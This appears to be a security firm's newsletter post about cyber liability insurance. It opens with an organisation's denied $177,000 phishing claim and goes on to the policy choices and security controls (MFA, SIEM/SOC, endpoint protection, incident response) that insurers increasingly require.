Literally as I was getting ready to write this newsletter, I got a scheduling request from an organization that noted in the request for the meeting – “We fell victim to a phishing scam and lost $177,000”. The heartbreaking part of the conversation was that the organization had a separate cyber liability insurance policy and the insurance carrier is denying the claim.
We continually preach that EVERY organization needs to have a separate cyber liability insurance policy in place. Many of the prospective businesses that we talk to indicate they have a cyber liability rider on their existing general liability policy and our answer is always – that’s not enough, the riders almost always have such loose verbiage that in an actual cyber event, you are likely to have the claim denied. Thus a separate and specific cyber liability policy should be put in place. This organization had the separate policy in place and the claim is still being denied – so what gives?
Having Cyber Liability Insurance Is No Longer A Guarantee Of Protection
Cyber crime has absolutely exploded over the last couple of years and now with the increase of state-actor sponsored attacks, the insurance industry is starting to react. It is to be expected however, I mean how many claims have to be paid before the industry exceeds the risk tolerance to provide a policy?
What Can You Do To Provide The Best Chance Of Coverage?
- Absolutely make sure you have a separate cyber liability policy and not just a rider or an addendum to your normal business general liability policy. The addendums or riders simply do not cover the needs and risks of today’s cyber threat landscape.
- Make sure that separate cyber liability policy is through a carrier that is familiar with cyber. Many times this may mean you have to go outside of your existing insurance broker or carrier. If you’re not being prompted by your broker/carrier for a separate cyber policy, that should be a red flag. If you ask your broker/carrier carrier and they don’t have a practice built around cyber, that should be a red flag. An insurance provider that is truly familiar with how to provide appropriate coverage is going to have a pretty extensive application process that may seem overwhelming, but is necessary to make sure you have the appropriate coverage.
- Don’t purchase cyber liability coverage based on the cheapest quote. That’s not to say you shouldn’t shop for options. However, the majority of the time the cheapest policy is also going to be the policy that provides the least amount of coverage and thus increases the potential for a claim to be denied when you need it the most.
Now That You Have Coverage What Are Your Responsibilities As The Insured?
You simply can not rest on your laurels any longer just because “you have insurance coverage”. If you read through your policy, you will most likely find you have specific responsibilities under the policy and those responsibilities are increasing every year. In fact, in some industries or scenarios, you may not be able to obtain coverage unless you have some of these responsibilities addressed. We are seeing multiple instances of insurance carriers requiring some of the following items before providing any coverage or renewals of existing policies;
- Multi-factor Authentication (MFA) to email and Cloud based solutions. This is a necessity in today’s climate.
- Multi-factor Authentication (MFA) for Windows desktop and systems access. This is a big challenge and not one that can be implemented overnight.
- Security event logging and analysis (SEIM and SOC). This involves having a system in place to collect all security logs, aggregate and retain that data, and to have a live person analyzing those results on a continuous basis.
- Advanced End-point Protection – not just your typical anti-virus, but endpoint protection that monitors the activities that are not typically flagged as malicious by antivirus, like remote desktop connections and powershell scripts.
- Incident Response Plan/Platform to ensure proper steps are identified and a response mapped out BEFORE something bad happens.
- Risk and Vulnerability Assessment – A process to review the technical operations to identify risks and liabilities on a scheduled basis.
- Formal controls – that identify all of the security mechanisms and policies are not only implemented but being enforced.
While none of these items by themselves provide total assurance of security and/or insurance coverage, in combination they increase the likelihood that in the event you have a cyber event occur, you have the best chance of a recovery. It’s a scary world in the cybersecurity landscape today especially if you are aware what is happening on a daily basis. Unfortunately the signs only point to it increasing in risk and damage. So the time to act is now to make sure your organization is protected as best as possible and that your insurance coverage is sufficient to cover any needs you may have.